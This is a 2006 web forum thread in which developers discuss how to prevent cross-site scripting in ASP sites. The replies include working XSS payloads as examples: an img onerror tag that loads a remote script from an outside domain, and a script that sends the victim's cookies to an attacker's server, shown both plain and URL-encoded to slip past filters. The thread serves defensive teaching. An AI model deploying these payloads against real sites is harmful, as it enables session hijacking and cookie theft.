|
|||||||||
|
|||||||||
|
|||||||||
 |
|||||||||
| |
||
|
|
|
|
|||||||||
|
|||||||||
|
|||||||||
|
|||||||||
| |
||
|
|
|
| |||||||||
 |
|
|
«
Previous Thread
|
Next Thread
»
|
Thread Tools | Search this Thread | Rate Thread | Display Modes |
ASP Free Forums Sponsor:
|
|
|
|
#1
November 16th, 2006, 04:46 PM
|
|||
|
|||
|
Cross-site scripting
Anyone have some quick coding guidelines to follow to minimize the possibility of cross-site scripting?
__________________
====== Doug G ====== I didn't attend the funeral, but I sent a nice letter saying I approved of it. --Mark Twain
|
|
#2
November 16th, 2006, 05:54 PM
|
||||
|
||||
|
Unfortunately, most people think the easiest way to prevent XSS attacks is to prevent the execution of javascript and filter our <script> type tags. This isn't true and there are ways that a hacker can encode the data to bypass this type of data validation.
There are two types of XSS attacks. Persistent and Non-persistent. Persistent attacks are anything that could be entered and remain to affect virtually all users that access the page in which the attack occurs. Think post or thread on a message board. If a discussion forum allowed this type of attack it would be persistent and could affect any user who views that post or thread. Non-Persistent attacks are more similar to phishing attacks. A targeted victim could be sent a link that appears legitimate, however on closer inspection the link contains additional information that if clicked would allow the hacker to hijack the victims session or execute malicious code in their browser. Virtually any HTML tag can be used as an attack vector to allow remote code execution. Example of some attack vectors: Code:
<img src="" onerror="x=document.createElement('<sc'+'ript src=http://www.mansiononmain.com/xss.js>');document.body.appendChild(x)">
Code:
<table style="background:url('javascript:alert('Table Tag XSS Attack');')" border="1" width="100%">
<tr style="background:url('javascript:alert('Row Tag XSS Attack');')">
<td style="background:url('javascript:alert('Cell Tag XSS Attack');')"></td>
</tr>
</table>
The best way to prevent these types of attacks is to prevent this type of input. If you must allow it then sanitize the results being returned from the client to ensure it doesn't contain anything that could be used maliciously. And when returning the results to the client consider using Server.HTMLEncode. Last edited by Memnoch : November 16th, 2006 at 05:58 PM.
|
|
#3
November 16th, 2006, 08:13 PM
|
|||
|
|||
|
The idea is to sanitize any input that may be used in subsequent pages, like a forum post or similar? From what I understand of the your example attack vector, this would be an img src that a user can add to some input that accepts html, and subsequently would be re-displayed to a future user?
Thanks for your help, I recently saw a reference to some xss vulnerability in Snitz code and didn't totally understand the flaw.
|
|
#4
November 17th, 2006, 08:28 AM
|
||||
|
||||
|
Quote:
Exactly, if you copied the img tag example into an html page and ran it you will see that the remote code gets executed and the page gets "hijacked".
|
|
#6
November 19th, 2006, 09:50 AM
|
||||
|
||||
|
You must also accommodate for the fact that the attacker may URL-Encode their scripts to prevent them from being picked out by your data sanitation scripts.
For example, the following 2 malicious scripts would do exactly the same thing after interpreted by the browser (they would both send the victim's cookies back to the attacker's server)... Plain text... Code:
<script language=javascript>
document.write('<img src=http://the-attackers-server/script.asp?'+document.cookie+'>');
</script>
Encoded... Code:
%3C%73%63%72%69%70%74%20%6C%61%6E%67%75%61%67%65%3 D%6A%61%76%61%73%63%72%69%70%74%3E%0D%0A%64%6F%63% 75%6D%65%6E%74%2E%77%72%69%74%65%28%27%3C%69%6D%67 %20%73%72%63%3D%68%74%74%70%3A%2F%2F%74%68%65%2D%6 1%74%74%61%63%6B%65%72%73%2D%73%65%72%76%65%72%2F% 73%63%72%69%70%74%2E%61%73%70%3F%27%2B%64%6F%63%75 %6D%65%6E%74%2E%63%6F%6F%6B%69%65%2B%27%3E%27%29%3 B%0D%0A%3C%2F%73%63%72%69%70%74%3E Also, XSS attacks can be performed via query strings (you probably knew that, but it is often over-looked). For example, someone came on ASPFree a while ago to get their site reviewed... it was vulnerable to XSS via it's query strings... Eatlocal.com - Harmless XSS Example (look down the right-hand-side when you go on the page)
__________________
LozWare Website Directory Whooo! Free submissions, no recip needed. I'm a nice guy 
Last edited by LozWare : November 19th, 2006 at 02:28 PM.
|
|
| Viewing: ASP Free Forums > System Administration > Windows Security > Cross-site scripting |
| Thread Tools | Search this Thread |
| Display Modes | Rate This Thread |
|
|
|
 |
|
|
|
|
|
Del.icio.us
Digg
Google
Spurl
Blink
Furl
Simpy
Y! MyWeb
Linear Mode
